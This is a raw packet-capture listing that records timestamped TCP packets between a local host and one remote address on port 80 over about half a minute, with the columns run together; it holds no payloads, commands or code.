                                                                Oct 11, 2024 01:36:54.778989077 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.832066059 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.895327091 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.900336981 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.989845037 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.990158081 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:54.995057106 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:54.995240927 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.050740004 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.055649996 CEST8049959188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.055659056 CEST8049959188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.055708885 CEST8049959188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.147794008 CEST8049959188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.187114000 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.284913063 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.320833921 CEST8049959188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.322325945 CEST4993880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.332186937 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.363303900 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.413659096 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.436723948 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.436755896 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.437298059 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.442143917 CEST8049959188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.442177057 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.442214966 CEST4995980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.442260027 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.442363977 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.442570925 CEST8049946188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.442642927 CEST4994680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.447350025 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.521461964 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.526514053 CEST8049966188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.526581049 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.526674986 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.531745911 CEST8049966188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.800789118 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.805838108 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.805871964 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.805902004 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.879293919 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.884207964 CEST8049966188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.884272099 CEST8049966188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.895711899 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:55.941309929 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:55.980717897 CEST8049966188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.035042048 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.144311905 CEST8049966188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.144846916 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.145580053 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.145643950 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.150451899 CEST8049965188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.150547981 CEST4996580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.191277027 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.254240990 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.255049944 CEST4997280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.259520054 CEST8049966188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.259572983 CEST4996680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.259944916 CEST8049972188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.260812044 CEST4997280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.260922909 CEST4997280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.265630007 CEST8049972188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.265856028 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.270981073 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.271049023 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.271164894 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.276135921 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.613408089 CEST4997280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.618459940 CEST8049972188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.618495941 CEST8049972188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.630465031 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.635483027 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.635545015 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.635557890 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.710197926 CEST8049972188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.714725018 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:56.753767967 CEST4997280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.769395113 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:56.955462933 CEST8049972188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.003767967 CEST4997280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.009361982 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.050662041 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.067070007 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.072010040 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.072088003 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.072257042 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.077033997 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.095498085 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.144414902 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.218811989 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.219513893 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.224124908 CEST8049973188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.224206924 CEST4997380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.224402905 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.224476099 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.224558115 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.229316950 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.425725937 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.430468082 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.430634975 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.520502090 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.566268921 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.582928896 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.587905884 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.587914944 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.587918997 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.668411016 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.722656012 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.764475107 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.816291094 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.879719973 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.884835005 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.925617933 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.972671032 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.979098082 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.979929924 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:57.984812021 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:57.984885931 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.073798895 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.074539900 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.079402924 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.079471111 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.079554081 CEST8049980188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.079570055 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.079602957 CEST4998080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.084271908 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.242364883 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.242676020 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.247582912 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.337806940 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.340290070 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.345151901 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.425720930 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.430699110 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.430707932 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.430713892 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.546412945 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.597814083 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.601186037 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.601497889 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.606408119 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.717273951 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.717569113 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.722462893 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.722558975 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.809245110 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.863130093 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.919728994 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.920516014 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.924993992 CEST8049986188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.925061941 CEST4998680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.925463915 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:58.925535917 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.925611019 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:58.930382967 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.016705036 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.016974926 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.021786928 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.111753941 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.111964941 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.116941929 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.116950035 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.116966009 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.315968990 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.321439981 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.321454048 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.321470022 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.374612093 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.376554012 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.385797977 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.391011000 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.425635099 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.480685949 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.482184887 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.487303972 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.487314939 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.691267014 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.738117933 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.790792942 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.811472893 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.811553955 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.812175035 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.816541910 CEST8049979188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.816596031 CEST4997980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.816822052 CEST8049992188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.816876888 CEST4999280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.816965103 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.817023993 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.817110062 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.821885109 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.895777941 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.900718927 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:59.900826931 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.900919914 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:59.905793905 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.175939083 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.180850983 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.180872917 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.180886984 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.254369020 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.259438038 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.259510040 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.279911995 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.331970930 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.354840994 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.394504070 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.457871914 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.503818035 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.548173904 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.597469091 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.601830959 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.644469976 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.670953989 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.671643972 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.676172972 CEST8049999188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.676455975 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.676506996 CEST4999980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.676538944 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.676645994 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.681333065 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.690242052 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.738132000 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.802390099 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.807279110 CEST8050009188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:00.807375908 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.807497978 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:00.812242985 CEST8050009188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.035137892 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.040039062 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.040172100 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.040183067 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.130950928 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.160176992 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.165127039 CEST8050009188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.165137053 CEST8050009188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.175890923 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.261552095 CEST8050009188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.316266060 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.382107973 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.425635099 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.425812006 CEST8050009188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.472446918 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.497982979 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.498014927 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.498104095 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.498830080 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.503777981 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.503855944 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.503961086 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.504143953 CEST8050009188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.504192114 CEST5000980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.504278898 CEST8050001188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.504332066 CEST5000180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.504367113 CEST8050007188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.504410982 CEST5000780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.508964062 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.536534071 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.541582108 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.541668892 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.541743040 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.546576977 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.864434004 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.869369030 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.869394064 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.869405031 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.895386934 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:01.900345087 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.900742054 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.957967043 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:01.994879007 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.003705978 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.035082102 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.164912939 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.206904888 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.327075958 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.356940031 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.356952906 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.362242937 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.363293886 CEST8050014188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.363362074 CEST5001480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.454045057 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.454662085 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.459830999 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.459840059 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.459847927 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.491147995 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.496076107 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.496140957 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.496270895 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.501092911 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.717705011 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.769479036 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.843585014 CEST5002180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.847639084 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.950894117 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.950959921 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.950980902 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.950998068 CEST8050021188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.951028109 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.951112986 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:02.951157093 CEST5002180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.951217890 CEST5002180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:02.956444979 CEST8050021188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.003968954 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.301130056 CEST5002180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.306216002 CEST8050021188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.306231022 CEST8050021188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.306240082 CEST8050021188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.321943998 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.363169909 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.404685020 CEST8050021188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.426218033 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.431448936 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.456931114 CEST5002180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.520462036 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.520757914 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.525716066 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.525784016 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.668101072 CEST8050021188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.722414017 CEST5002180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.779370070 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.780303001 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.780378103 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.785238981 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.785634041 CEST8050015188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.785712957 CEST5001580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.874893904 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.875116110 CEST5002080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.880095005 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.880126953 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.880299091 CEST8050020188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:03.901724100 CEST5003180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:03.906575918 CEST8050031188.114.96.3192.168.2.5
